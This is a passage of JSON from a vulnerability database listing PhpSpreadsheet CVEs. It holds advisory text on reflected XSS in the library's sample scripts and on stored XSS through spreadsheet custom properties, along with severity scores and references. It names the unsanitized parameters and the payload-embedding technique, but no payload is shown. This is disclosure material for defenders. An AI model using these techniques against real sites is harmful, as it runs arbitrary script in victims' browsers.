omposer/phpoffice/phpspreadsheet@3.7.0"}],"aliases":["CVE-2024-56411","GHSA-hwcp-2h35-p66w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ahdt-gmt1-7bb8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56428?format=json","vulnerability_id":"VCID-bwgw-r1g3-8fhn","summary":"PhpSpreadsheet allows unauthorized Reflected XSS in the constructor of the Downloader class\n# Unauthorized Reflected XSS in the constructor of the `Downloader` class\n\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1**: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N)\n**CVSS vector v.4.0**: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L)\n**Description**: using the `/vendor/phpoffice/phpspreadsheet/samples/download.php` script, an attacker can perform a XSS-type attack\n**Impact**: execution of arbitrary JavaScript code in the browser\n**Vulnerable component**: the constructor of the `Downloader` class\n**Exploitation conditions**: an unauthorized user\n**Mitigation**: sanitization of the `name` and `type` variables\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in the constructor of the `Downloader` class) in Phpspreadsheet.\n\nThe latest version (3.6.0) of the `phpoffice/phpspreadsheet` library was installed. The installation was carried out with the inclusion of examples.\n\n*Listing 1. Installing the `phpoffice/phpspreadsheet` library*\n```\n$ composer require phpoffice/phpspreadsheet --prefer-source\n```\n\nThe `./vendor/phpoffice/phpspreadsheet/samples/download.php` file processes the GET parameters `name` and `type`.\n\n![fig1](https://github.com/user-attachments/assets/78d5b3c7-e2ab-4487-98e2-a975f74a71c0)\n\n*Figure 1. 
The `./vendor/phpoffice/phpspreadsheet/samples/download.php` file accepts GET parameters.*\n\nConsider the constructor of the `Downloader` class, where GET parameters are passed. Error is displayed without sanitization using GET parameters transmitted from the user.\n\n![fig2](https://github.com/user-attachments/assets/00baf1f8-298c-4654-a3e4-b99cf8053eac)\n\n*Figure 2. Error is displayed without sanitization*\n\nWhen clicking on the following link, arbitrary JavaScript code will be executed.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56365","reference_id":"","reference_type":"","scores":[{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76142","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76123","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76135","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76143","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76148","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56365"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4#diff-fbb0f53a5c68eeeffaa9ab35552c0b01740396f1a4045af5d2935ec2a62a7816","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1"
,"scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:16:35Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4#diff-fbb0f53a5c68eeeffaa9ab35552c0b01740396f1a4045af5d2935ec2a62a7816"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56365","reference_id":"CVE-2024-56365","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56365"},{"reference_url":"https://github.com/advisories/GHSA-jmpx-686v-c3wx","reference_id":"GHSA-jmpx-686v-c3wx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jmpx-686v-c3wx"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-jmpx-686v-c3wx","reference_id":"GHSA-jmpx-686v-c3wx","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:16:35Z/"}],"ur
l":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-jmpx-686v-c3wx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83680?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83681?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/83678?format=json","purl":
"pkg:composer/phpoffice/phpspreadsheet@3.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.7.0"}],"aliases":["CVE-2024-56365","GHSA-jmpx-686v-c3wx"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bwgw-r1g3-8fhn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56426?format=json","vulnerability_id":"VCID-dhfy-12tw-uuh2","summary":"PhpSpreadsheet allows unauthorized Reflected XSS in `Convert-Online.php` file\n# Unauthorized Reflected XSS in `Convert-Online.php` file\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1**: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N)\n**CVSS vector v.4.0**: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L)\n**Description**: using the `/vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php` script, an attacker can perform a XSS-type attack \n**Impact**: executing arbitrary JavaScript code in the browser\n**Vulnerable component**: the `/vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php` file\n**Exploitation conditions**: an unauthorized user\n**Mitigation**: sanitization of the quantity variable\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in `Convert-Online.php` file) in Phpspreadsheet.\n\nThere is no sanitization in 
the `/vendor/phpoffice/phpspreadsheet/samples/Engineering/Convert-Online.php` file, which leads to the possibility of a XSS attack.\n\n![fig4](https://github.com/user-attachments/assets/71a6ab8b-db65-4e7e-bb36-39f0bd0f7077)\n\n*Figure 4. The message with the quantity parameter is displayed without sanitization*\n\n\nThe following figure shows a POST HTTP-request and a response to the server with the variable quantity, which is displayed in the response from the server without sanitization.\n\n<img width=\"460\" alt=\"fig5\" src=\"https://github.com/user-attachments/assets/022323c9-ca1e-44ea-9380-37ed7848e971\" />\n\n*Figure 5. In the server's response , the quantity variable is displayed without sanitization*\n\nAn attacker can prepare a special HTML form that will be automatically sent to the vulnerable scenario.\n\n*Listing 3. HTML form that demonstrates the exploitation of the XSS vulnerability*","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56408","reference_id":"","reference_type":"","scores":[{"value":"0.01392","scoring_system":"epss","scoring_elements":"0.80734","published_at":"2026-06-05T12:55:00Z"},{"value":"0.01392","scoring_system":"epss","scoring_elements":"0.80749","published_at":"2026-06-09T12:55:00Z"},{"value":"0.01392","scoring_system":"epss","scoring_elements":"0.80729","published_at":"2026-06-08T12:55:00Z"},{"value":"0.01392","scoring_system":"epss","scoring_elements":"0.80732","published_at":"2026-06-07T12:55:00Z"},{"value":"0.01392","scoring_system":"epss","scoring_elements":"0.80736","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56408"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC
:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:19:25Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/9b9a55c7154daa7cd4095f618933c240508ba3c1","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:19:25Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/9b9a55c7154daa7cd4095f618933c240508ba3c1"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/a50ebfe118b3ae0ddaea1c48ac19dc38692f4abc","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"v
alue":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:19:25Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/a50ebfe118b3ae0ddaea1c48ac19dc38692f4abc"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/b8fac55aa5cb7a3d514c7308378bb37bb711b25e","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:19:25Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/b8fac55aa5cb7a3d514c7308378bb37bb711b25e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56408","reference_id":"CVE-2024-56408","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56408"},{"reference_url":"https://github.com/advisories/GHSA-x88g-h956-m5xg","reference_id":"GHSA-x88g-h956-m5xg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x88g-h956-m5xg"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-x88g-h956-m5xg","reference_id":"GHSA-x88g-h956-m5xg","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr
","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:19:25Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-x88g-h956-m5xg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83680?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83681?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7
bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/83678?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.7.0"}],"aliases":["CVE-2024-56408","GHSA-x88g-h956-m5xg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dhfy-12tw-uuh2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56423?format=json","vulnerability_id":"VCID-ghv1-bdy8-hygk","summary":"PhpSpreadsheet has a Cross-Site Scripting (XSS) vulnerability in custom properties\n# Cross-Site Scripting (XSS) vulnerability in custom properties\n\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1**: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n**CVSS vector v.4.0**: 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)\n**Description**: the HTML page is generated without clearing custom properties\n**Impact**: executing arbitrary JavaScript code in the browser\n**Vulnerable component**: class `PhpOffice\\PhpSpreadsheet\\Writer\\Html`, method `generateMeta`\n**Exploitation conditions**: a user viewing a specially generated Excel 
file\n**Mitigation**: additional sanitization of special characters in a string\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Cross-Site Scripting (XSS) vulnerability in custom properties in Phpspreadsheet.\nThe following code is written on the server, which translates the XLSX file into a HTML representation and displays it in the response.\n\n*Listing 9. Source code on the server*\n\n```\n<?php\n\nrequire __DIR__ . '/vendor/autoload.php';\n\n$inputFileName = './doc/Book1.xlsx';\n$spreadsheet = \\PhpOffice\\PhpSpreadsheet\\IOFactory::load($inputFileName);\n$writer = new \\PhpOffice\\PhpSpreadsheet\\Writer\\Html($spreadsheet);\nprint($writer->generateHTMLAll());\n```\n\nAn attacker can embed a payload in a file property that will result in the execution of arbitrary JavaScript code.\nThe Excel file is unpacked and a custom property in the file is inserted into the `docProps/custom.xml` file.\n\n![fig17](https://github.com/user-attachments/assets/65453b48-bca5-4f5c-a683-315a7bb1ab1f)\n\n*Figure 17. Embedding the payload*\n\nAfter making the changes, a new archive with the xlsx extension was created. At the moment of converting the xlsx file into an HTML representation, a property is obtained that participates in the formation of a string without sanitization.\n\n![fig18](https://github.com/user-attachments/assets/e0f63bfb-d9e1-4c9d-a2a9-8a0a20406cdc)\n\n*Figure 18. Getting a custom property*\n\nWhen calling the static `generateMeta` method, you can see that the key of the custom property is displayed without sanitization.\n\n![fig19](https://github.com/user-attachments/assets/8c74e264-af68-4f62-8ac7-437e65884e86)\n\n*Figure 19. 
Getting a custom property*\n\nAs a result, when viewing the excel file as the HTML representation, arbitrary JavaScript code will be executed.\n\n<img width=\"356\" alt=\"fig20\" src=\"https://github.com/user-attachments/assets/a6ed21e3-685c-415c-b2dc-453bc0652bef\" />\n\n*Figure 20. Executing arbitrary JavaScript code*\n\n# Credit\nThis vulnerability was discovered by **Aleksey Solovev (Positive Technologies)**","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56410","reference_id":"","reference_type":"","scores":[{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76142","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76123","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76135","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76143","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76148","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56410"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/45052f88e04c735d56457a8ffcdc40b2635a028e","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/
AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:01:24Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/45052f88e04c735d56457a8ffcdc40b2635a028e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56410","reference_id":"CVE-2024-56410","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56410"},{"reference_url":"https://github.com/advisories/GHSA-wv23-996v-q229","reference_id":"GHSA-wv23-996v-q229","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wv23-996v-q229"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wv23-996v-q229","reference_id":"GHSA-wv23-996v-q229","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:01:24Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wv23-996v-q229"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:comp
oser/phpoffice/phpspreadsheet@1.29.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83680?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83681?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},